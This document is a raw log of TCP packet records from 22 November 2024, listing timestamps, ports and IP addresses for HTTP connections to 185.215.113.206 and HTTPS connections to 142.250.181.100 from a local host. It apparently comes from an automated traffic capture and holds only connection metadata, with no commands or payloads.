Nov 22, 2024 20:35:08.916985989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.972500086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.972640991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.972654104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.972757101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.972883940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.972927094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.972991943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.973051071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.973911047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.973961115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.974069118 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.974117994 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.974852085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.974903107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.974922895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.974963903 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.975802898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.975857973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.975891113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.975955963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.976804018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.976862907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.976900101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.976953030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.977773905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.977834940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.977859974 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.977879047 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.978765011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.978873014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.978893042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.978935003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.979733944 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.979784966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.979840994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.979888916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.980712891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.980763912 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.980784893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.980833054 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.981744051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.981796980 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.981853008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.981901884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.982702017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.982765913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.982769012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.982808113 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.983691931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.983752012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.983769894 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.983810902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.984635115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.984685898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.984724045 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.984771013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.985615015 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.985665083 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.985786915 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.985829115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.986605883 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.986687899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.986706018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.986746073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.987580061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.987631083 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.987654924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.987696886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.988542080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.988593102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.988626957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.988670111 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.989542007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.989593983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.989619970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.989672899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.990549088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.990611076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.990612030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.990653992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.991503954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.991555929 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.991597891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.991642952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.992475033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.992526054 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.992611885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.992660046 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.993438005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.993485928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.993614912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.993658066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:08.994383097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:08.994436026 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.040178061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.040194035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.040294886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.040623903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.040643930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.040671110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.040699959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.041397095 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.041452885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.041524887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.041568041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.042350054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.042395115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.042423010 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.042489052 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.042859077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.042901993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.042939901 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.042982101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.043931961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.043976068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.043998957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.044034958 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.044840097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.044887066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.044914961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.044959068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.045942068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.046010017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.046045065 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.046092033 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.046787977 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.046829939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.046919107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.046958923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.047789097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.047832012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.048086882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.048135042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.048775911 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.048835039 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.048873901 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.048923969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.049761057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.049808025 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.049824953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.049870014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.050738096 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.050791979 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.050877094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.050926924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.051686049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.051733971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.051783085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.051830053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.052664995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.052726030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:09.052761078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:09.052810907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:10.404134035 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.404175043 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.404251099 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.408390045 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.408407927 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.435584068 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.435617924 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.435673952 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.436211109 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.436223030 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.525548935 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.525593996 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.525656939 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.526442051 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.526454926 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.527820110 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.527865887 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:10.527925014 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.528090954 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:10.528107882 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.173793077 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.174238920 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.174308062 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.175304890 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.175385952 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.176570892 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.176673889 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.176731110 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.194477081 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.194768906 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.194807053 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.196443081 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.196521044 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.196805954 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.196899891 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.196949959 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.217963934 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.217988014 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.243896961 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.243912935 CET	443	49735	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.243977070 CET	49735	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.265420914 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.275137901 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.278008938 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.278040886 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.279119968 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.279194117 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.279722929 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.279789925 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.279872894 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.279881954 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.323023081 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.323282003 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.323338985 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.324309111 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.324903965 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.324971914 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.325683117 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.325779915 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.325822115 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.367377043 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.374078035 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.374136925 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:12.420979023 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:12.748595953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:12.748663902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:13.023156881 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.023196936 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.023231983 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.023251057 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.023277998 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.023389101 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.023598909 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.025912046 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.025975943 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.026213884 CET	49734	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.026247025 CET	443	49734	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.151225090 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.151385069 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.151443005 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.151458979 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.151536942 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.151597023 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.151603937 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.167757034 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.167815924 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.167823076 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.175586939 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.175647974 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.175653934 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.188390017 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.188546896 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.188632965 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.190026999 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.190073013 CET	49737	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.190089941 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.190099001 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.190121889 CET	443	49737	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.233275890 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.279081106 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.327487946 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.339334965 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.352220058 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.352271080 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.352278948 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.356403112 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.356452942 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.356458902 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.370428085 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.370491028 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.370498896 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.380009890 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.380074978 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.380080938 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.390638113 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.390696049 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.390710115 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.404177904 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.404241085 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.404251099 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.418466091 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.418549061 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.418560028 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.435024023 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.435096979 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.435105085 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.447473049 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.447532892 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.447545052 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.465388060 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.465440989 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.465450048 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.468214989 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.468270063 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.468277931 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.514426947 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.514436007 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.540858030 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.540927887 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.540949106 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.551074028 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.551141024 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.551148891 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.557801008 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.557864904 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.557873011 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.564560890 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.564621925 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.564630985 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.571372032 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.571444988 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.571451902 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.579817057 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.579876900 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.579885006 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.586615086 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.586675882 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.586683989 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.591403961 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.591455936 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.591463089 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.599389076 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.599462986 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.599471092 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.608633041 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.608688116 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.608695984 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.617935896 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.617990017 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.617997885 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.627696037 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.627768993 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.627775908 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.636879921 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.636931896 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.636943102 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.646369934 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.646430016 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.646444082 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.661025047 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.661088943 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.661097050 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.665103912 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.665146112 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.665158987 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.665168047 CET	443	49736	142.250.181.100	192.168.2.4
